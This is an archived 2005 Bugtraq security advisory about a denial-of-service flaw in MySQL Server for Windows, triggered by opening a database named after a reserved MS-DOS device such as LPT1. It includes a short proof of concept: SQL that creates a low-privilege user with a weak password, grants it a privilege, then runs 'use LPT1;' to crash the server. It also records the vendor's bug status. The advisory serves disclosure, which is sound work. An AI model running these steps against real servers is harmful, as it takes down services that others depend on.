Denial of Service Vulnerability in MySQL Server for Windows

From: Luca Ercoli (io_at_lucaercoli.it)
Date: 03/15/05

  • Next message: Yves Belle-Isle: "Re: Av issues"
    Date: 15 Mar 2005 18:47:16 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Package: MySQL Database Server for Windows
    Auth: http://www.mysql.com/
    Version(s): 4.1.XX/4.0.XX/5.0.XX
    Vulnerability Type: Denial of Service

    Disclaimer:
    ==========

    The information is provided "as is" without warranty of any kind.
    The author of this issue shall not be held liable for any
    downtime, lost profits, or damages due to the informations
    contained in this advisory.

    What’s MySQL:
    ============

    MySQL is a multi-user, multi-threaded relational database management system.
    The MySQL database server is the world's most popular open source database.

    Vulnerability Description:
    =========================

    A vulnerability exist in the way application handle requests
    containing reserved MS-DOS devices name (AUX,CON,COM1,LPT1 and PRN).
    This flaw allows an authenticaded user with at least one of those
    privileges globally (on *.*):

    - REFERENCES
    - CREATE TEMPORARY TABLES
    - GRANT OPTION
    - CREATE
    - SELECT

    to cause the service to fail.

    Proof of Concept:
    ================

    1- Create an user account:

    (connected as 'root')

    use mysql;
    INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));

    2- Grant to him one or more privileges reported above:

    (connected as 'root')

    GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
    flush privileges;

    3- Connect to server using new account and 'use' the database 'LPT1':

    (connected as 'customer')
    use LPT1;

    Vendor Status:
    =============

     http://bugs.mysql.com/

     ID: 9148
     Updated by: Miguel Solorzano
     Reported by: Luca Ercoli
     User Type: User
     Status: Verified
     Severity: S2 (Serious)
     Category: Server
     Operating System: Windows
    -Version: 4.1.9
    +Version: 4.1.XX/4.0.XX/5.0.XX

    Credits:

    ---
    Luca Ercoli
    io [at] lucaercoli.it
    www.lucaercoli.it
    

  • Next message: Yves Belle-Isle: "Re: Av issues"

    Relevant Pages

    • Re: Mysql connection
      ... MaxTemplar wrote: ... the server with software is a linux machine, the mysql database server ... is windows 2000. ...
      (comp.lang.java.databases)
    • Mysql connection
      ... the server with software is a linux machine, the mysql database server ... is windows 2000. ...
      (comp.lang.java.databases)